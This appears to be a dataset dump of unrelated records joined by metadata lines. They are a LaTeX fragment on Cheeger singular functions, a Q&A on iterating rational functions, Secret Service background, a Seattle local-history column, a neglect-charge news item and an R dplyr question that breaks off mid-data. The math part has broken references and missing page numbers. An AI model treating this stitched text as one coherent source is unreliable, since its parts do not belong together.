$$\int_{\Omega}|DG'|^{p_0-2}DG'\cdot D{\varphi}_1\, d\mu = \int_{\Omega}|DG'|^{p_0-2}DG'\cdot D{\varphi}_2\, d\mu.$$ Thus $K(G')=K(G',p_0,{\Omega})$, in particular, $K$ does not depend on ${\varphi}$. Another property of $K(G')$ that will play an important role is that $$K(G') > 0,$$ see below. We obtain the following result on the growth of Cheeger singular functions near a singularity. \[thm:blowup\] Let ${\Omega}$ be a relatively compact domain in $X$, $x_0 \in {\Omega}$, and $1<p<Q(x_0)$. If $G'$ is a Cheeger singular function, i.e. $G'$ satisfies conditions 1–3 in Definition \[def:G\], with singularity at $x_0$ and given $0<R\leq R_0({\Omega})$ for which $\overline{B}(x_0,R) \subset {\Omega}$, then for every $0<r<R$ we have $$m_{G'}(x_0,r) \leq \biggl(\frac{K(G')}{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R))}\biggr)^{1/(p_0-1)} +M_{G'}(x_0,R).$$ Suppose $r_0 \in (0,R)$ is such that $m_{G'}(x_0,r_0)\geq M_{G'}(x_0,R)$, then for every $0<r<r_0$ we have $$\begin{gathered} M_{G'}(x_0,r) \geq C(1-\frac{r}{r_0})^{p_0}\biggl(\frac{K(G')}{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))}\biggr)^{1/(p_0-1)} \\ + M_{G'}(x_0,R),\end{gathered}$$ where $C=(C_1/C_4)^{1/(p_0-1)} > 0$, and the constants $C_1$ and $C_4$ are as in theorems \[thm:below\] and \[thm:above\], respectively. Consider a radius $R>0$ such that $\overline{B}(x_0,R)\subset{\Omega}$. Define $w=G'-M(R)$, and hence $w\leq 0$ on $\partial B(x_0,R)$. Observe also that the first inequality in the theorem obviously holds true if $m(r) \leq M(R)$, thus, we might as well assume that $m(r) > M(R)$. Let functions $v$ and ${\varphi}=v/m_w(r)$ be defined as in the proof of Theorem \[thm:blowupI\] with $G$ replaced by $G'$. Then ${\varphi}$ can be used in the definition of $K(G')$, see . We have $$\begin{aligned} K(G') & = \int_{B(x_0,R)\setminus \overline{B}(x_0,r)}|DG'|^{p_0-2}DG'\cdot D{\varphi}\, d\mu \\ & = \frac1{m_w(r)}\int_{B(x_0,R)\setminus \overline{B}(x_0,r)} |DG'|^{p_0-2}DG'\cdot Dv\, d\mu.\end{aligned}$$ Observing that $Dv = 0$ whenever $v\neq w$, whereas $Dv=Dw=DG'$ on the set where $v=w$, we conclude $$\label{eq:K=} K(G') = \frac1{m_w(r)}\int_{B(x_0,R)}|Dv|^{p_0}\, d\mu = m_w^{p_0-1}\int_{B(x_0,R)}|D{\varphi}|^{p_0}\, d\mu.$$ Note at this point that proves that $K(G')>0$. Indeed, if, in fact, $K(G')\leq 0$, the Sobolev–Poincaré inequality implies that $$\int_{B(x_0,R)}|v|^{p_0}\, d\mu \leq CR^{p_0}\int_{B(x_0,R)} |Dv|^{p_0}\, d\mu \leq 0,$$ and, moreoover, $v\equiv 0$ in $B(x_0,R)$. This, in turn, would contradict the fact that $G'(x) \to \infty$ when $x$ tends to $x_0$. This shows that $K(G')>0$. Observing that ${\varphi}=v/m_w(r)$ is an admissible function for the capacity of $B(x_0,r)$ with respect to $B(x_0,R)$, we obtain from that $$\begin{aligned} \label{eq:upperbound} \operatorname{Cap}_{p_0} & (\overline{B}(x_0,r),B(x_0,R)) \leq \int_{B(x_0,R)\setminus \overline{B}(x_0,r)} |D(v/m_w(r))|^{p_0}\, d\mu \\ & \leq \frac1{m_w(r)^{p_0}}\int_{B(x_0,R)\setminus \overline{B}(x_0,r)}|Dv|^{p_0}\, d\mu \leq m_w(r)^{1-p_0}K(G'). \nonumber\end{aligned}$$ This implies the first claim. To prove the second iequality of the claim, we observe that $w(x) \to \infty$, when $x$ tends to $x_0$. As above, $w=G'-M(R)$. Also thanks to one has that $$m_w(r) \geq m_w(\rho), \quad 0<r<\rho<R.$$ Let $r_0\in(0,R)$ be such that $m(r_0)\geq M(R)$. This implies that $w\geq 0$ on $\overline{B}(x_0,r_0)$. For any $0<r<r_0$ consider the function $\psi:{\mathbb{R}}\to{\mathbb{R}}$ defined by $$\psi(t) = \left\{\begin{array}{ll} 1, & \textrm{ in } 0\leq t \leq r, \\ \frac{t^{\frac{p_0-Q(x_0)}{p_0-1}}-r_0^{\frac{p_0-Q(x_0)}{p_0-1}}}{r^{\frac{p_0-Q(x_0)}{p_0-1}}-r_0^{\frac{p_0-Q(x_0)}{p_0-1}}}, & \textrm{ in } r\leq t\leq r_0, \\ 0, & \textrm{ in } r_0 \leq t \leq R. \end{array} \right.$$ Observe that $\psi \in L^\infty({\mathbb{R}})$, $\operatorname{supp}(\psi') \subset [r,r_0]$, and that $\psi' \in L^\infty({\mathbb{R}})$, thus $\psi$ is a Lipschitz function. Moreover, $\psi\circ d(x_0,x) \in N^{1,p_0}(B(x_0,R))$. As in the proof of Theorem 4.5 in Garofalo–Marola [@GaMa], we obtain $$\int_{B(x_0,R)}|D\psi|^p_0\,d\mu \leq C_4\frac{\mu(B(x_0,r))}{r^{p_0}}.$$ On the other hand, if we use Theorem \[thm:below\], for the proof see [@GaMa], we have $$\label{eq} \int_{B(x_0,R)}|D\psi|^{p_0}\,d\mu \leq \frac{C_4}{C_1} (1-\frac{r}{r_0})^{p_0(1-p_0)}\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0)).$$ Since $\psi\circ d(x_0,x)$ is an admissible function for $K(G')$, it follows from , , and Hölder’s inequality that $$\begin{aligned} \label{eq:upper} & K(G')^{p_0/(p_0-1)} \\ & \leq \biggl(\int_{B(x_0,R)}|D\psi|^{p_0}\,d\mu\biggr)^{1/(p_0-1)}\int_{B(x_0,r_0)\setminus \overline{B}(x_0,r)}|DG'|^{p_0}\,d\mu \nonumber \\ & \leq \biggl(\frac{C_4}{C_1}\biggr)^{1/(p_0-1)}(1-\frac{r}{r_0})^{-p_0}\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))^{1/(p_0-1)} \cdot \nonumber \\ & \int_{B(x_0,r_0)\setminus \overline{B}(x_0,r)}|Dw|^{p_0}\,d\mu \nonumber. \end{aligned}$$ Let us introduce the function $\xi \in N^{1,p_0}(B(x_0,R))$ defined by $$\xi = \left\{\begin{array}{ll} 0, & \textrm{ in } {\Omega}\setminus B(x_0,R), \\ \max\{w,0\}, & \textrm{ in } B(x_0,R)\setminus B(x_0,r_0), \\ w, & \textrm{ in } B(x_0,r_0)\setminus B(x_0,r) \\ \min\{w,M_w(r)\}, & \textrm{ in } B(x_0,r). \end{array} \right.$$ Observe that we have $\xi = M_w(r)$ in a neighborhood of $x_0$. Let $$I = \{x\in B(x_0,R):\ \xi (x)=w(x)\}.$$ Since $|D\xi|=|Dw|=|DG'|$ on $I$, and $|D\xi| = 0$ on $B(x_0,R)\setminus I$, from we have $$\begin{aligned} & \int_{B(x_0,r_0)\setminus \overline{B}(x_0,r)}|Dw|^{p_0}\,d\mu \leq \int_I |Dw|^{p_0-2}Dw\cdot Dw\, d\mu \\ & = \int_I|Dw|^{p_0-2}Dw\cdot D\xi\, d\mu = \int_{B(x_0,R)}|Dw|^{p_0-2}Dw\cdot D\xi\, d\mu \\ & = K(G')M_w(r).\end{aligned}$$ By plugging this in , we finally conclude that $$\begin{gathered} M(r) \geq \biggl(\frac{C_1}{C_4}\biggr)^{1/(p_0-1)}(1-\frac{r}{r_0})^{p_0} \\ \cdot\biggl(\frac{K(G')}{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))}\biggr)^{1/(p_0-1)} + M(R).\end{gathered}$$ This completes the proof. By obivious modifications, the preceding argument holds in the case $p_0=Q(x_0)$ as well. Observe that assuming only conditions 1–3 in Definition \[def:G\], factor $K(G')$ comes up in the above estimates as opposed to the estimates in Theorem \[thm:blowupI\]. We have the following result on the local behavior of a Cheeger singular function near a singularity. The proof of this result is similar to that of Theorem \[thm:localbI\], thus, we omit the proof. \[thm:localb\] Let ${\Omega}$ be a relatively compact domain in $X$, and $x_0 \in {\Omega}$. If $G'$ is a Cheeger singular function, i.e. $G'$ satisfies conditions 1–3 in Definition \[def:G\], with singularity at $x_0$, then there exist positive constants $C_1,C_2$ and $R_0$ such that for any $0<r<\frac{R_0}{2}$ and $x \in B(x_0,r)$ we have $$\begin{aligned} C_1\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)} & \leq G'(x) \\ & \leq C_2\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)},\end{aligned}$$ when $1<p_0<Q(x_0)$, whereas $$C_1 \log\left(\frac{R_0}{d(x,x_0)}\right) \leq G'(x) \leq C_2\log\left(\frac{R_0}{d(x,x_0)}\right),$$ when $p_0=Q(x_0)$. Here the constants $C_1$ and $C_2$ depend on $K(G')$, $p_0$, $x_0$, and the local parameters of ${\Omega}$, and $R_0$ depends only on ${\Omega}$. The following lemma is well-known and we omit the proof. \[poteq\] Let $K$ be a closed subset of a relatively compact domain ${\Omega}$, and let $u$ be the [[$p\mspace{1mu}$]{}]{}$_0$-potential of $K$ with respect to ${\Omega}$. Then for all $0\leq\alpha < \beta \leq 1$ one has $$\operatorname{Cap}_{p_0}({\Omega}^{\beta}, {\Omega}_{\alpha})=\frac{\operatorname{Cap}_{p_0}(K,{\Omega})} {(\beta-\alpha)^{p_0-1}}.$$ We close this paper with the following observation. The proof of Proposition \[prop:scaling\] is similar to the proof of Lemma 3.16 in Holopainen [@Holopainen], but we present it here for completeness. \[prop:scaling\] Let $G'$ be a Cheeger singular function, i.e. $G'$ satisfies conditions 1–3 in Definition \[def:G\]. Then $$G = K(G')^{-1/(p_0-1)}G'$$ is a (Cheeger) Green’s function with equality in condition 4 in Definition \[def:G\]. Observing that the function ${\varphi}= \min\{G',1\}$ can be used in , and since $G'$ is the [[$p\mspace{1mu}$]{}]{}$_0$-potential of the set $\{x\in{\Omega}: G'\geq 1\}$ with respect to ${\Omega}$, we obtain $$\label{eq:G'pot} \operatorname{Cap}_{p_0}(\{x\in{\Omega}:\ G'(x)\geq 1\},{\Omega}) = K(G').$$ Let $0\leq \alpha < \beta$ and suppose first that $\beta\leq K(G')^{-1/(p_0-1)}$. Then one has $$\begin{aligned} & \operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, \{x\in{\Omega}:\ G(x)>\alpha\}) \\ & = \operatorname{Cap}_{p_0}(\{x\in{\Omega}:\ G'(x) \geq \beta K(G')^{1/(p_0-1)}\}, \\ & \hspace{1.5cm}\{x\in{\Omega}:\ G'(x)>\alpha K(G')^{1/(p_0-1)}\}) \\ & = (\beta-\alpha)^{1-p_0}K(G')^{-1} \operatorname{Cap}_{p_0}(\{x\in{\Omega}: G'(x)\geq 1\}, {\Omega}) \\ & = (\beta-\alpha)^{1-p_0}.\end{aligned}$$ Let then assume that $K(G')^{-1/(p_0-1)} < \beta$. Equation implies that $$\begin{aligned} & \frac{\operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, {\Omega})}{(K(G')^{-1/(p_0-1)}/\beta)^{p_0-1}} \\ & = \operatorname{Cap}_{p_0}(\{x\in{\Omega}: \frac{G(x)}{\beta}\geq \frac{K(G')^{-1/(p_0-1)}}{\beta}\}, {\Omega}) \\ & = K(G'),\end{aligned}$$ from which it follows that $$\operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, {\Omega}) = \beta^{1-p_0}.$$ Then one has $$\begin{aligned} & \operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, \{x\in{\Omega}:\ G(x)>\alpha\}) \\ & = \operatorname{Cap}_{p_0}(\{x\in{\Omega}:\ G(x)/\beta \geq 1\}, \{x\in{\Omega}:\ G(x)/\beta>\alpha/\beta\}) \\ & = (1-\alpha/\beta)^{1-p_0}\operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, {\Omega}) \\ & = (\beta-\alpha)^{1-p_0}.\end{aligned}$$ This completes the proof. [99]{} [[Balogh, Z.M., Holopainen, I. [[and ]{}]{}Tyson, J.T., Singular solutions, homogeneous norms, and quasiconformal mappings in Carnot groups, *Math. Ann. **324 (2002), .***]{}]{} , [Quasicontinuity of Newton–Sobolev functions and density of Lipschitz functions on metric spaces]{}, [to appear in *Houston J. Math.*]{} [[Björn, A. [[and ]{}]{}Marola, N., Moser iteration for (quasi)minimizers on metric spaces, *Manuscripta Math. **121 (2006), .***]{}]{} [[Björn, J., Boundary continuity for quasiminimizers on metric spaces, *Illinois J. Math. **46 (2002), .***]{}]{} [[Björn, J., MacManus, P. [[and ]{}]{}Shanmugalingam, N., Fat sets and pointwise boundary estimates for [[$p\mspace{1mu}$]{}]{}-harmonic functions in metric spaces, *J. Anal. Math. **85 (2001), .***]{}]{} [[Buser, P., A note on the isoperimetric constant, *Ann. Sci École Norm. Sup. **15 (1982), .***]{}]{} [[Capogna, L., Danielli, D. [[and ]{}]{}Garofalo, N., Capacitary estimates and the local behavior of solutions of nonlinear subelliptic equations, *Amer. J. Math. **118 (1996), .***]{}]{} [[Carathéodory, C., Untersuchungen über die Grundlangen der Thermodynamik, *Math. Ann. **67 (1909), .***]{}]{} [[Chavel, I., *Eigenvalues in Riemannian Geometry, Pure and Applied Mathematics, vol. 115, Academic Press, Orlando, 1984.*]{}]{} [[Cheeger, J., Differentiability of Lipschitz functions on metric measure spaces, *Geom. Funct. Anal. **9 (1999), .***]{}]{} [[Chow, W.L., Über System von linearen partiellen Differentialgleichungen erster Ordnug, *Math. Ann. **117 (1939), .***]{}]{} [[David, G. [[and ]{}]{}Semmes, S., *Fractured fractals and broken dreams. Self-similar geometry through metric and measure, Oxford Lecture Series in Mathematics and its Applications, 7. The Clarendon Press, Oxford University Press, New York, 1997.*]{}]{} , [Sharp capacitary estimates for rings in metric spaces]{}, [to appear in *Houston J. Math.*]{} [[Garofalo, N. [[and ]{}]{}Nhieu, D.-M., Isoperimetric and Sobolev inequalities for Carnot-Carathéodory spaces and the existence of minimal surfaces, *Comm. Pure Appl. Math. **49 (1996), .***]{}]{} [[Hajłasz, P. [[and ]{}]{}Koskela, P., Sobolev met Poincaré, *Mem. Amer. Math. Soc. **145 (2000), .***]{}]{} [[Heinonen, J., *Lectures on Analysis on Metric Spaces, Springer-Verlag, New York, 2001.*]{}]{} [[Heinonen, J., Kilpeläinen, T. [[and ]{}]{}Martio, O., *Nonlinear Potential Theory of Degenerate Elliptic Equations, Oxford University Press, Oxford, 1993.*]{}]{} [[Heinonen, J. [[and ]{}]{}Koskela, P., Quasiconformal maps in metric spaces with controlled geometry, *Acta Math. **181 (1998), .***]{}]{} [[Holopainen, I., Nonlinear potential theory and quasiregular mappings on Riemannian manifolds, *Ann. Acad. Sci. Fenn. Ser. A I Math. Diss. **74 (1990), .***]{}]{} [[Holopainen, I. [[and ]{}]{}Shanmugalingam, N., Singular functions on metric measure spaces, *Collect. Math. **53 (2002), .***]{}]{} [[Jerison, D., The Poincaré inequality for vector fields satisfying Hörmander’s condition, *Duke Math. J. **53 (1986), .***]{}]{} [[Kallunki, S. [[and ]{}]{}Shanmugalingam, N., Modulus and continuous capacity, *Ann. Acad. Sci. Fenn. Math. **26 (2001), .***]{}]{} [[Keith, S., A differentiable structure for metric measure spaces, *Adv. Math. **183 (2004), .***]{}]{} [[Kilpeläinen, T., Kinnunen, J. [[and ]{}]{}Martio, O., Sobolev spaces with zero boundary values on metric spaces, *Potential Anal. **12 (2000), .***]{}]{} [[Kinnunen, J. [[and ]{}]{}Martio, O., The Sobolev capacity on metric spaces, *Ann. Acad. Sci. Fenn. Math. **21 (1996), .***]{}]{} , [Choquet property for the Sobolev capacity in metric spaces]{}, in [*Proceedings on Analysis and Geometry*]{} (Novosibirsk, Akademgorodok, 1999), pp. 285–290, Sobolev Institute Press, Novosibirsk, 2000. [[Kinnunen, J. [[and ]{}]{}Shanmugalingam, N., Regularity of quasi-minimizers on metric spaces, *Manuscripta Math. **105 (2001), .***]{}]{} [[Littman, W., Stampacchia, G. [[and ]{}]{}Weinberger, H.F., Regular points for elliptic equations with discontinuous coefficients, *Ann. Scuola Norm. Sup. Pisa (3) **18 (1963), .***]{}]{} [[Nagel, A., Stein, E.M. [[and ]{}]{}Wainger, S., Balls and metrics defined by vector fields I: basic properties, *Acta Math. **155 (1985), .***]{}]{} [[Rashevsky, P.K., Any two points of a totally nonholonomic space may be connected by an admissible line, *Uch. Zap. Ped. Inst. im. Liebknechta, Ser. Phys. Math., (Russian) **2 (1938), .***]{}]{} [[Rothschild, L.P. [[and ]{}]{}Stein, E.M., Hypoelliptic differential operators and nilpotent groups, *Acta Math. **137 (1976), .***]{}]{} , [Metric spaces and mappings seen at many scales]{} (Appendix B in [Gromov, M.,]{} *Metric Structures for Riemannian and Non-Riemannian Spaces*), [Ed. Progress in Mathematics, Birkhäuser, Boston, 1999.]{} [[Serrin, J., Local behavior of solutions of quasilinear equations, *Acta Math. **111 (1964), .***]{}]{} [[Serrin, J., Isolated singularities of solutions of quasilinear equations, *Acta Math. **113 (1965), .***]{}]{} [[Shanmugalingam, N., Newtonian spaces An extension of Sobolev spaces to metric measure spaces, *Rev. Mat. Iberoamericana **16 (2000), .***]{}]{} [[Shanmugalingam, N., Harmonic functions on metric spaces, *Illinois J. Math. **45 (2001), .***]{}]{} [^1]: Second author supported in part by NSF Grant DMS-0701001 [^2]: Third author supported by the Academy of Finland and Emil Aaltosen säätiö
null
minipile
NaturalLanguage
mit
null
Q: When does the sequence of iterates of a rational function converge? Darsh asks at the 20-questions seminar: Let $f:P^1 \rightarrow P^1$ be rational function. Can you say when the sequence $\{ f^n(x)\}_n=\{ x,f(x),f(f(x)),\cdots\} $ converges? What about the sequence of averages $\left\{ \frac{1}{n+1}\sum_{i=0}^n f^i (x)\right\}_n$? Anything else? A: I haven't really studied complex dynamics much, but here's a suggestion for the general case: In the Fatou set of f, you should use Sullivan's classification of Fatou components to help figure out the behavior of your sequence of averages. On the Julia set, the behavior of the sequence of averages is going to be some kind of a weighted average of f, but as the the orbit of a generic point in J is dense in J, would the sequence of averages of such a point converge to something like a center of mass? A: If a trajectory $f^n(x)$ converges, the limit must be a fixed point, that is it satisfies $f(a)=a$. The number of fixed points is finite, and they can be all found by solving an algebraic equation. Now the question is for given $x$ and $a$ to decide whether $f^n(x)\to a$. This can happen in two ways: a) $f^n(x)=a$ for some $n$, so the sequence becomes constant from some place, and trivially converges, or b) $f^n(x)\to a$ but $f^n(x)\neq a$ for all $n$. Whether a) happens for a given $x$ might be difficult to decide. The set of all $x$ for which $f^n(x)=a$ for some $n$ is usually dense on the Julia set, and the Julia set is quite complicated. One can show that it is not semi-algebraic in most cases, with a few trivial exceptions when it is a circle or an arc of a circle. Of course one can give various meanings to the words "given $x$" and "to find out". The question can be easier if, for example, $x$ is rational, and coefficients of $f$ are rational. Or algebraic. Otherwise it is not clear in what form $x$ can be "given", etc. In the case $b$, there is a reasonable description of the sets of convergence. The fixed points are divided into several categories according to the multiplier $\lambda=f'(a)$. For convergence b) to happen, this multiplier has to satisfy $|\lambda|<1$, or $\lambda^n=1$. This is a very deep result of R. Perez Marco. In these two cases, convergence b) happens in the so-called "domains of attraction", which are open but not necessarily connected. The boundary of such domain of attraction coincides with the Julia set, so the "domains" can be quite complicated. But one can obtain very good pictures of them with a computer. A: Consider a Mobius transformation f := z -> (az+b)/(cz+d) which rotates the Riemann sphere by an angle theta, where theta/Pi is not rational. Then the sequence of iterates of f is not periodic. But iterating f gives values which are uniformly distributed and dense on a certain circle on the Riemann sphere. Change coordinates back to the plane and I suspect the sequence of averages converges to the mean value on that circle. I haven't actually done the computation, though.
null
minipile
NaturalLanguage
mit
null
Treasury roles, covering missions such as prevention and investigation of counterfeiting of U.S. currency and U.S. treasury bonds notes and investigation of major fraud. Protective roles, ensuring the safety of current and former national leaders and their families, such as the President, past Presidents, Vice Presidents, presidential candidates, foreign embassies (per an agreement with the US State Department's Bureau of Diplomatic Security (DS) Office of Foreign Missions (OFM)), etc. The Secret Service's initial responsibility was to investigate crimes related to the Treasury and then evolved into the United States' first domestic intelligence and counterintelligence agency. Many of the agency's missions were later taken over by subsequent agencies such as the FBI, ATF, and IRS. The agency combines the resources of academia; the private sector; and Federal, State, and Local law enforcement agencies to combat computer-based threats to the U.S. financial payment systems and critical infrastructures. In addition, these combined resources allow ECTF to identify and address potential cybervulnerabilities before the criminal element exploits them. This proactive approach has successfully prevented cyber attacks that otherwise would have resulted in large-scale financial losses for the American public and U.S.-based companies or disruption of critical infrastructures. Since onlinechild pornography crime is not a core violation for the agency, it has pursued fewer investigations involving this crime than other crimes, such as counterfeiting. However, some USSS field offices with a background in these areas as well as digital forensic capabilities investigate these crimes.
null
minipile
NaturalLanguage
mit
null
Seattle Now & Then: A Moveable Fiesta THEN: Sitting on a small triangle at the odd northwest corner of Third Avenue and the Second Ave. S. Extension, the Fiesta Coffee Shop was photographed and captioned, along with all taxable structures in King County, by Works Progress Administration photographers during the lingering Great Depression of the late 1930s. (Courtesy, Washington State Archive’s Puget Sound Branch)NOW: Jean Sherrard has followed the landmark adobe hut’s move of 1938 across the Second Ave. Extension. With this week’s “Now and Then” Jean and I have conspired, perhaps, to confuse you, although not for long. On first glimpse it is evident that in the 76 years that separate our “then” from our “now,” their shared subject, an adobe hut at the corner of Main Street and the Second Ave. S. Extension, has endured. However, on second glimpse, it is also certain that the hut’s milieu has pivoted. We explain. Before the Second Ave. Extension, looking south from the Smith Tower on March 14, 1928. (Courtesy Municipal Archive)Fourteen months later, June 11, 1929. (Courtesy, Seattle Municipal Archive) In 1928 the long, wide, and straight path of Seattle’s Second Avenue, between Stewart Street and Yesler Way, was cut through to Jackson Street as the Second Ave. S. Extension. Thereby, it was explained, “Seattle’s Market Street” (a little used nickname) might make a grand beeline to the railroad stations on the south side of Jackson. Of the fifteen buildings sliced into along the new route, three were entirely destroyed, including a fire station with tower that sat at the northwest corner of Main Street and Third Avenue. (Station No. 10’s own feature is attached below.) The Extension ran right through that station’s former location, except for its northeast and southwest corners, which became small triangular lots on either side of the Extension. (Here you may wish to find a map. There’s a good one on the blog listed at the bottom. We’ll make it easier and put both a detail below from the 1912 Baist Map and another from the sky: a detail of the corner and more in Seattle’s city-wide 1936 aerial.) Someone has drawn borders for the 1928 Second Ave. Extension through this detail from the 1912 Baist Real Estate Map. Yesler Way runs along the top, and Jackson Street the bottom. Note, near the center, the Fire Department Headquarters, aka Fire Station No. 10. here at the northwest corner of Third Ave. South and Main Street. (Courtesy, Ron Edge)A detail from the 1936 aerial map-survey of Seattle. Yesler Way is at the top, Jackson St. at the bottom, and the Second Avenue Extension clearly cuts between them. The two triangles – east and west – are found just below the middle of the subject. (Courtesy, Seattle Municipal Archive)The Fiesta’s original location. Third Avenue is on the right, and Main Street behind Jean.. In our “then,” the Fiesta Coffee Shop stands on the triangle on the east side of Second. The buildings behind it are on Third Avenue. In our “now,” however, the adobe hut survives on the Extension’s west side as the Main Street Gyro, and the structures that surround it are mostly on Second Avenue and Main Street. To record his “repeat,” Jean stood just off the curb on Main. Another of the Foster and Kleiser billboard recordings, this one dated July 8, 1929, soon after the completion of the Second Ave. Extension. The scene looks west on Main Street and across the freshly paved Extension. As the company’s caption makes clear, this negative was exposed for the billboard on the east facade of the Hotel Main. It advertises Westerman’s Lee Oversalls.A tax photo from January 1, 1938, showing the Hotel Main and, on the right in the west triangle, appears to be a hut, connected, perhaps to Schneiderman’s gas station, when it was still on this the west side of the Second Ave. Extension. Sometime during the warmer months of 1938, the small café was moved across the Second Ave. S. Extension as Betty’s Coffee Shop, in a trade of triangles between Harry Schneiderman and Betty. The small service station Schneiderman had built on the west triangle, he rebuilt on the east side as a modern Signal station with four pumps and two bays for repairs. Under his name, which he signed below the station’s roofline, the one time center for the UW football team added, “I Ain’t Mad at Nobody.” Harry “I ain’t mad at nobody” Schneiderman’s Signal Station snuggled in the triangle on the east side of the Second Ave. Extension, on Oct. 4, 1938. That is 3rd Ave. S. on the right. (Courtesy, Washington State Archive, Bellevue Community College branch) With the help of Bob Masin, the hut’s owner since 1980, we have figured that since the small café’s 1938 move across the Extension, it has had six names with six cuisines. It began in 1938 as Betty’s Coffee Shop and continued so into the 1970s. Masin remembers sitting as a child with his father and grandfather at the small counter watching Betty, always in her apron, serve the policemen standing in the aisle drinking coffee. Following Betty’s came the Greek Villa, the Masada Café, the Penguin Café, the Main Street Teriyaki, and presently the Main Street Gyro. The “east triangle” with the Boston Baked Beans log cabin in 1937. Sometime soon after this tax photo was recorded the sides were flattened with plaster and the menu changed to Mexican. The Ace Hotel at 312-318 Second Ave., was one of the buildings sliced thru with the 1928-29 Second Ave. S. extension. (Courtesy, Washington State Archive, the branch on the Bellevue Community College campus. Returning now to the hut’s origins, the earliest tax photo (above) from 1937 shows it as a log cabin for the short-lived sale of New England Baked Beans and Brown Bread, and the tax card accompanying the photo has it built in 1934. And so we may confidently make note that without leaving the corner, the café’s earliest move was from Massachusetts to Mexico when the logs were covered with adobe and the roof with red tiles for the also short-lived Fiesta Coffee-Shop. WEB EXTRAS Additions galore this week, lads? Jean, Ron has put up a healthy seven links, and the first one looks north and directly through the new intersection of Third Ave. S., the Second Ave. Extension and Main Street. Look close and you will find the Fiesta in the “east triangle” before it was moved to the other (west) side of the Second Ave. Extension. [If this triangle business is not clear by now, I’m wringing my hands!] The links will be followed by three or four other features that are not so recent as The Seven Below, but still are either of the neighborhood or one of the this feature’s subjects that being fast food, and want of food fast. ====== A FIVE BALL CLUSTER at THIRD AVE. S. AND MAIN STREET, CA. 1911 (Courtesy, Seattle Municipal Archive) A corner of Fire House No. 10 shows across Main Street on the left. This appeared first in Pacific, October, 9, 1994. ====== FIREHOUSE NO. 10 Both the Great Northern (with the tower) and Union Pacific Depots, are found here on the far side of Jackson Street in this ca. 1913 look down from the new Smith Tower. A second tower, appearing on the bottom-right, is part of Firehouse No. 10 at the northwest corner of Main Street and Third Ave. South. There is, of course, as yet no Second Ave. Extension. (Courtesy, Lawton Gowey)Firehouse No.10 – and its tower – under construction in 1903. Looking northwest to the northwest corner of Third Ave. and Main Street.
null
minipile
NaturalLanguage
mit
null
North Dakota woman charged with leaving 6 kids with dead man A North Dakota woman has been charged with felony child neglect after she was accused of leaving six children with the body of an acquaintance who overdosed FARGO, N.D. -- A North Dakota woman has been charged with felony child neglect after she was accused of leaving six children with the body of an acquaintance who overdosed. Amber Barrett of Fargo also is charged with a misdemeanor count of failing to report a death. Documents filed in Cass County District Court said police were called on Nov. 16 to a home on a report of an unresponsive man. Officers were let into the home by six minor children, ages unknown, who directed them to the man lying on the living room floor. Efforts to revive the man were unsuccessful. Police contacted Barrett, who was at work, and she returned home. Barrett told an officer that her friend was sweating heavily and slurring his words earlier and she believed he was likely overdosing. Police said, however, that Barrett knew the man was dead before she left for work. Court records do not list an attorney for Barrett who could speak on her behalf.
null
minipile
NaturalLanguage
mit
null
Q: How do I calculate percent difference between max and min values in consecutive rows by group? Request I was able to identify the minimum and maximum in_state_total values by the group. I would like to add another column that calculates the percent difference between the maximum value and the minimum value for each group. The result should occupy both rows for each group so I can further sort the data before plotting. I would prefer a dplyr approach, but am open to exploring other options in order to deepen my understanding of the issue and the potential solutions. Current Code tuition_cost_clean %>% filter(degree_length == "4 Year") %>% arrange(state, desc(in_state_total)) %>% group_by(state_abbr) %>% slice(which.max(in_state_total), which.min(in_state_total)) %>% select(name, state_abbr, in_state_total) Current Output name state_abbr in_state_total <chr> <chr> <dbl> Alaska Pacific University AK 28130 Alaska Bible College AK 15000 Spring Hill College AL 52926 Huntsville Bible College AL 5390 Hendrix College AR 58074 University of Arkansas for Medical Sciences AR 8197 Desired Output name state_abbr in_state_total pct_change <chr> <chr> <dbl> Alaska Pacific University AK 28130 46.6761% Alaska Bible College AK 15000 46.6761% Spring Hill College AL 52926 89.816% Huntsville Bible College AL 5390 89.816% Hendrix College AR 58074 85.8852% University of Arkansas for Medical Sciences AR 8197 85.8852% Data tuition_cost_clean <- structure(list(name = c("Aaniiih Nakoda College", "Abilene Christian University", "Abraham Baldwin Agricultural College", "Academy College", "Academy of Art University", "Adams State University", "Adelphi University", "Adirondack Community College", "Adrian College", "Advanced Technology Institute", "Adventist University of Health Sciences", "Agnes Scott College", "Aiken Technical College", "Aims Community College", "Alabama Agricultural and Mechanical University", "Alabama Southern Community College", "Alabama State University", "Alamance Community College", "Alaska Bible College", "Alaska Pacific University", "Albany College of Pharmacy and Health Sciences", "Albany State University", "Albany Technical College", "Albertus Magnus College", "Albion College", "Albright College", "Alcorn State University", "Alderson-Broaddus University", "Alexandria Technical and Community College", "Alfred University", "Allan Hancock College", "Allegany College of Maryland", "Allegheny College", "Allegheny Wesleyan College", "Allen College", "Allen County Community College", "Allen University", "Alliant International University", "Alma College", "Alpena Community College", "Alvernia University", "Alverno College", "Alvin Community College", "Amarillo College", "Amberton University", "American Academy McAllister Institute of Funeral Service", "American Academy of Art", "American Academy of Dramatic Arts", "American Academy of Dramatic Arts: West", "American Baptist College", "American Indian College of the Assemblies of God", "American International College", "American Jewish University", "American National University: Charlottesville", "American National University: Danville", "American National University: Harrisonburg", "American National University: Lynchburg", "American National University: Martinsville", "American National University: Salem", "American University SystemFor-profit", "American River College", "American Samoa Community College", "American University", "American University of Puerto Rico", "Amherst College", "Amridge University", "Ancilla College", "Anderson University", "Anderson University", "Andrew College", "Andrews University", "Angelina College", "Angelo State University", "Anna Maria College", "Anne Arundel Community College", "Anoka Technical College", "Anoka-Ramsey Community College", "Antelope Valley College", "Antioch College", "Antioch University Los Angeles", 